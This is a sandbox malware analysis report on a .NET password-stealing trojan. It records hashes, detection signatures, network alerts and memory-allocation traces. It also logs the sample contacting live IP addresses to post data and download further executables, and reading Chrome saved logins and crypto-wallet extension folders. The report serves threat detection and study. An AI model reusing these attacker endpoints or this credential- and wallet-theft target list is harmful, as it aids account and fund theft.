Summary | ZeroBOX

66f18a5501651_ww_a.exe

Gen1 Generic Malware .NET framework(MSIL) Malicious Library UPX Malicious Packer Anti_VM PWS ftp AntiDebug PE64 dll PE File OS Processor Check PE32 ZIP Format .NET EXE AntiVM DllRegisterServer DLL
Category Machine Started Completed
FILE s1_win7_x6403_us Sept. 24, 2024, 10:48 a.m. Sept. 24, 2024, 11:10 a.m.
Size 9.4MB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 221942540e2630630887a7b59a855ec2
SHA256 45f875dde426c2a7bd4cc1debccc69f49554b06d6682b11e1d653a764881d1ad
CRC32 D6591FA4
ssdeep 196608:muD3qUwPM2yoVEHGoGeFdJJMGHPP/CPZ5za/+qKcDxNY5fv7RFHnTKm:HD2ymXbeFV/m5zQAfHHTF
PDB Path softevo.pdb
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • Is_DotNET_EXE - (no description)
  • Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult
  • IsPE32 - (no description)
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check

IP Address Status Action
103.130.147.211 Active Moloch
104.237.62.213 Active Moloch
104.26.4.15 Active Moloch
164.124.101.2 Active Moloch
172.67.219.22 Active Moloch
172.67.75.163 Active Moloch
34.117.59.81 Active Moloch
45.91.200.135 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.103:50800 -> 164.124.101.2:53 2054168 ET INFO External IP Lookup Domain in DNS Lookup (ipinfo .io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49171 -> 104.26.4.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 104.237.62.213:443 -> 192.168.56.103:49168 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
UDP 192.168.56.103:52760 -> 164.124.101.2:53 2047702 ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup Misc activity
TCP 192.168.56.103:49167 -> 104.237.62.213:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity
TCP 192.168.56.103:49167 -> 104.237.62.213:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49167 -> 104.237.62.213:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity
TCP 192.168.56.103:49169 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49169 -> 34.117.59.81:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49169 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49172 -> 172.67.75.163:443 2042969 ET INFO Observed External IP Lookup Domain in TLS SNI (api .myip .com) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49172 -> 172.67.75.163:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49175 -> 103.130.147.211:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 103.130.147.211:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 103.130.147.211:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 192.168.56.103:49175 -> 103.130.147.211:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 103.130.147.211:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 103.130.147.211:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 103.130.147.211:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 103.130.147.211:80 -> 192.168.56.103:49175 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 103.130.147.211:80 -> 192.168.56.103:49174 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 103.130.147.211:80 -> 192.168.56.103:49175 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 103.130.147.211:80 -> 192.168.56.103:49174 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
UDP 192.168.56.103:56613 -> 164.124.101.2:53 2054101 ET INFO URL Shortener Service Domain in DNS Lookup (iplog .co) Misc activity
TCP 192.168.56.103:49174 -> 103.130.147.211:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 172.67.219.22:443 2054102 ET INFO Observed URL Shortener Service Domain (iplog .co in TLS SNI) Misc activity
TCP 192.168.56.103:49179 -> 172.67.219.22:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49167 -> 104.237.62.213:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49171
104.26.4.15:443
C=US, O=Google Trust Services, CN=WR1 CN=db-ip.com e0:87:2e:81:a3:0e:fe:55:82:41:57:b8:ff:b2:84:42:af:47:01:7c
TLSv1
192.168.56.103:49172
172.67.75.163:443
C=US, O=Google Trust Services, CN=WR1 CN=myip.com b3:80:cf:15:df:f5:53:6f:d4:e4:88:68:de:87:c0:e1:f8:3b:2c:02
TLSv1
192.168.56.103:49179
172.67.219.22:443
C=US, O=Google Trust Services, CN=WE1 CN=iplog.co 41:e9:ee:71:f9:ab:52:5b:92:34:76:d8:19:e9:da:99:7a:44:b4:0a

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
pdb_path softevo.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .sdata
resource name DATAFILE
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x740e1194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x73fb2ba1
mscorlib+0xb3c869 @ 0x730fc869
mscorlib+0xb3ae13 @ 0x730fae13
0x55b6154
0x55b5e32
0x98ed71
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x73f32652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x73f4264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x73f42e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x73ff74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x73ff7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x74081dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x74081e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x74081f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7408416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x745df5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x74867f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x74864de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 1763952
registers.edi: 0
registers.eax: 1763952
registers.ebp: 1764032
registers.edx: 0
registers.ebx: 5914640
registers.esi: 5529120
registers.ecx: 2678566815
1 0 0
suspicious_features Connection to IP address suspicious_request GET http://45.91.200.135/api/wp-ping.php
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://45.91.200.135/api/wp-admin.php
suspicious_features Connection to IP address suspicious_request HEAD http://103.130.147.211/Files/CheckTool.exe
suspicious_features Connection to IP address suspicious_request HEAD http://103.130.147.211/Files/tac.exe
suspicious_features Connection to IP address suspicious_request HEAD http://103.130.147.211/Files/Channel2.exe
suspicious_features Connection to IP address suspicious_request GET http://103.130.147.211/Files/CheckTool.exe
suspicious_features Connection to IP address suspicious_request GET http://103.130.147.211/Files/tac.exe
request GET http://45.91.200.135/api/wp-ping.php
request POST http://45.91.200.135/api/wp-admin.php
request HEAD http://103.130.147.211/Files/CheckTool.exe
request HEAD http://103.130.147.211/Files/tac.exe
request HEAD http://103.130.147.211/Files/Channel2.exe
request GET http://103.130.147.211/Files/CheckTool.exe
request GET http://103.130.147.211/Files/tac.exe
request GET https://db-ip.com/demo/home.php?s=
request GET https://api.myip.com/
request GET https://iplog.co/1S3fd7
request POST http://45.91.200.135/api/wp-admin.php
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 800
region_size: 1835008
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00620000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f31000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f32000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 917504
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00620000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00412000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0042c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00980000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0044b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00447000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00445000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0041a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 49152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00981000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00436000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0043a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00437000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0098d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0042a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0098e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73db4000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0098f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 20480
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055b1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0042d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x055ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05850000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 20480
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05851000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05856000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05857000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05858000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05859000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74801000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x747b1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x756e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74791000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74781000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74741000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x746f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74381000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76971000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74fc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74661000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74341000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74321000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x742e1000
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghpilmjholiicaobfjdkefcogmgaabif
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\agoakfejjabomempkjlepdflaleeobhb
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mfgccjchihfkkindfppnaooecgfneiii
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fmblappgoiilbgafhjklehhfifbdocee
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
domain ipinfo.io
file C:\Users\test22\AppData\Local\Temp\_MEI27602\VCRUNTIME140.dll
file C:\Users\test22\Documents\iofolko5\VKiUj1bswl1U4GpzdLupgrRl.exe
file C:\Users\test22\Documents\iofolko5\t5zjygAQWmij_0YBlvBaECOC.exe
file C:\Users\test22\AppData\Local\Temp\_MEI27602\python312.dll
file C:\Users\test22\AppData\Local\Temp\_MEI27602\tk86t.dll
file C:\Users\test22\AppData\Local\Temp\_MEI27602\tcl86t.dll
file C:\Users\test22\AppData\Local\Temp\_MEI27602\numpy.libs\msvcp140-23ebcc0b37c8e3d074511f362feac48b.dll
file C:\Users\test22\AppData\Local\Temp\_MEI27602\libssl-3.dll
file C:\Users\test22\AppData\Local\Temp\_MEI27602\zlib1.dll
file C:\Users\test22\AppData\Local\Temp\_MEI27602\VCRUNTIME140_1.dll
file C:\Users\test22\AppData\Local\Temp\_MEI27602\pywin32_system32\pywintypes312.dll
file C:\Users\test22\AppData\Local\Temp\_MEI27602\libcrypto-3.dll
file C:\Users\test22\Documents\iofolko5\YejNVAIvCzXJTGcowdi8At0t.exe
file C:\Users\test22\AppData\Local\Temp\_MEI27602\numpy.libs\libscipy_openblas64_-c16e4918366c6bc1f1cd71e28ca36fc0.dll
file C:\Users\test22\AppData\Local\Temp\_MEI27602\libffi-8.dll
file C:\Users\test22\Documents\iofolko5\VKiUj1bswl1U4GpzdLupgrRl.exe
Time & API Arguments Status Return Repeated

InternetReadFile

